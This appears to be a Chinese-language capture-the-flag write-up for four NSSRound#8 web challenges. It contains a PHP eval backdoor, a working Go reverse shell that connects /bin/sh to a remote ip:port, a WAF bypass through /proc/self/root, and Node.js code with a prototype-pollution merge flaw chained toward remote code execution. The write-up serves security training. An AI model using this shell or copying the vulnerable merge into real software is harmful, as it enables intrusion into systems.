文章目录
- 一、[NSSRound#8 Basic]MyDoor
- 二、[NSSRound#8 Basic]Upload_gogoggo
- 三、[NSSRound#8 Basic]MyPage
- 四、[NSSRound#8 Basic]ez_node
一、[NSSRound#8 Basic]MyDoor
error_reporting(0);
if (isset($_GET['N_S.S'])) {
eval($_GET['N_S.S']);
}
if(!isset($_GET['file'])) {
header('Location:/index.php
注意要把参数_变成[ 否则后面的.会变成下划线。
二、[NSSRound#8 Basic]Upload_gogoggo
上传的文件会被go自动执行,使用go反弹shell。
package main;import"os/exec";import"net";func main(){c,_:=net.Dial(“tcp”,“ip:port”);cmd:=exec.Command(“/bin/sh”);cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}’
然后flag找半天,在/home/galf里,base64解密即可
三、[NSSRound#8 Basic]MyPage
有waf,/var/www/html出现就会waf,但是直接又读不了index.php,尝试用/proc/self/root连接回/使用脏数据绕过看看。
四、[NSSRound#8 Basic]ez_node
看到这道题,看到merge就知道和原型链污染有关,但是node.js基础太差了,很懵,也搞不出来,所以只能看看出题人WP了
分成了一个submit和一个上交文件两个模块,源码在附件可以看到
const express = require("express");
const path = require("path");
const fs = require("fs");
const multer = require("multer");
const PORT = process.env.port || 3000
const app = express();
global = "global"
app.listen(PORT, () => {
console.log(`listen at ${PORT}`);
});
function merge(target, source) {
for (let key in source) {
if (key in source && key in target) {
merge(target[key], source[key])
} else {
target[key] = source[key]
}
}
}
let objMulter = multer({ dest: "./upload" });
app.use(objMulter.any());
app.use(express.static("./public"));
app.post("/upload", (req, res) => {
try{
let oldName = req.files[0].path;
let newName = req.files[0].path + path.parse(req.files[0].originalname).ext;
fs.renameSync(oldName, newName);
res.send({
err: 0,
url:
"./upload/" +
req.files[0].filename +
path.parse(req.files[0].originalname).ext
});
}
catch(error){
res.send(require('./err.js').getRandomErr())
}
});
app.post('/pollution', require('body-parser').json(), (req, res) => {
let data = {};
try{
merge(data, req.body);
res.send('Register successfully!tql')
require('./err.js').getRandomErr()
}
catch(error){
res.send(require('./err.js').getRandomErr())
}
})
obj={
errDict: [
'发生肾么事了!!!发生肾么事了!!!',
'随意污染靶机会寄的,建议先本地测',
'李在干神魔👹',
'真寄了就重开把',
],
getRandomErr:() => {
return obj.errDict[Math.floor(Math.random() * 4)]
}
}
module.exports = obj
好像大概就是通过merge原型链污染,使得exports污染为{“./err”:“上传的文件”},然后再使得报错,触发上传文件实现RCE,具体分析可以看出题人WP。
出题人WP